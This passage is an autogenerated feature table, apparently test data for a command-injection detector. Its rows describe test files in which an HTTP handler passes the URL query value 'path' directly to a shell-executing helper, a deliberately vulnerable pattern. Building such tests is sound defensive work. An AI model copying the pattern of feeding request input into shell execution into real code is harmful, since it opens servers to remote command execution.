autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | this | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | this | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | this | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:17:29 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | 'arguments' object of anonymous function | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | 'arguments' object of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | exceptional return of anonymous function | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | exceptional return of anonymous function | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | exceptional return of anonymous function | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | exceptional return of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | functio ... md]);\\n} | CalleeFlexibleAccessPath | import(!).createServer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | functio ... md]);\\n} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | functio ... md]);\\n} | calleeImports | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | functio ... md]);\\n} | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | functio ... md]);\\n} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | functio ... md]);\\n} | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | return of anonymous function | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | return of anonymous function | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | return of anonymous function | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:30:20:1 | return of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:39:17:41 | req | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:39:17:41 | req | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:39:17:41 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:39:17:41 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:39:17:41 | req | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:39:17:41 | req | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:39:17:41 | req | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:39:17:41 | req | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:39:17:41 | req | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:39:17:41 | req | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:44:17:46 | res | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:44:17:46 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:44:17:46 | res | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:44:17:46 | res | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:17:44:17:46 | res | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:9 | cmd | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:9 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:9 | cmd | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:9 | cmd | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:9 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:58 | cmd | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:58 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:58 | cmd | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:58 | cmd | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:58 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:58 | cmd = r ... ry.path | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:58 | cmd = r ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:58 | cmd = r ... ry.path | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:58 | cmd = r ... ry.path | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:7:18:58 | cmd = r ... ry.path | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:19 | require | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:19 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:19 | require | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:19 | require | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:19 | require | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:26 | exceptional return of require('url') | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:26 | exceptional return of require('url') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:26 | exceptional return of require('url') | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:26 | exceptional return of require('url') | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:26 | exceptional return of require('url') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:26 | require('url') | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:26 | require('url') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:26 | require('url') | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:26 | require('url') | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:26 | require('url') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:32 | require('url').parse | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:32 | require('url').parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:32 | require('url').parse | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:32 | require('url').parse | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:32 | require('url').parse | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:47 | exceptional return of require ... , true) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:47 | exceptional return of require ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:47 | exceptional return of require ... , true) | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:47 | exceptional return of require ... , true) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:47 | exceptional return of require ... , true) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:47 | require ... , true) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:47 | require ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:47 | require ... , true) | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:47 | require ... , true) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:47 | require ... , true) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:53 | require ... ).query | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:53 | require ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:53 | require ... ).query | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:53 | require ... ).query | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:53 | require ... ).query | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:58 | require ... ry.path | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:58 | require ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:58 | require ... ry.path | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:58 | require ... ry.path | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:13:18:58 | require ... ry.path | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:21:18:25 | 'url' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:21:18:25 | 'url' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:21:18:25 | 'url' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:21:18:25 | 'url' | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:21:18:25 | 'url' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:21:18:25 | 'url' | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:21:18:25 | 'url' | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:21:18:25 | 'url' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:28:18:32 | parse | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:28:18:32 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:28:18:32 | parse | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:28:18:32 | parse | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:28:18:32 | parse | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:36 | req | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:36 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:36 | req | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:36 | req | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:36 | req | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:40 | req.url | CalleeFlexibleAccessPath | import(!).parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:40 | req.url | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:40 | req.url | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:40 | req.url | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:40 | req.url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:40 | req.url | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:40 | req.url | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:34:18:40 | req.url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:38:18:40 | url | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:38:18:40 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:38:18:40 | url | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:38:18:40 | url | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:38:18:40 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:43:18:46 | true | CalleeFlexibleAccessPath | import(!).parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:43:18:46 | true | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:43:18:46 | true | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:43:18:46 | true | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:43:18:46 | true | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:43:18:46 | true | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:43:18:46 | true | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:43:18:46 | true | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:49:18:53 | query | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:49:18:53 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:49:18:53 | query | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:49:18:53 | query | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:49:18:53 | query | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:55:18:58 | path | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:55:18:58 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:55:18:58 | path | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:55:18:58 | path | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:18:55:18:58 | path | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:10 | execEach | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:10 | execEach | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:10 | execEach | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:10 | execEach | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:10 | execEach | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:17 | exceptional return of execEach([cmd]) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:17 | exceptional return of execEach([cmd]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:17 | exceptional return of execEach([cmd]) | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:17 | exceptional return of execEach([cmd]) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:17 | exceptional return of execEach([cmd]) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:17 | execEach([cmd]) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:17 | execEach([cmd]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:17 | execEach([cmd]) | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:17 | execEach([cmd]) | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:3:19:17 | execEach([cmd]) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:12:19:16 | [cmd] | CalleeFlexibleAccessPath | execEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:12:19:16 | [cmd] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:12:19:16 | [cmd] | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:12:19:16 | [cmd] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:12:19:16 | [cmd] | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:12:19:16 | [cmd] | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:12:19:16 | [cmd] | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:13:19:15 | cmd | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:13:19:15 | cmd | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:13:19:15 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:13:19:15 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:13:19:15 | cmd | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:13:19:15 | cmd | enclosingFunctionBody | req res cmd require url parse req url true query path execEach cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:13:19:15 | cmd | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:13:19:15 | cmd | enclosingFunctionName | createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:13:19:15 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:19:13:19:15 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:0 | this | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | Busboy | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | Busboy | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | Busboy | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | formidable | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | formidable | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | formidable | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | multiparty | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | multiparty | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:1:1:1:1 | multiparty | 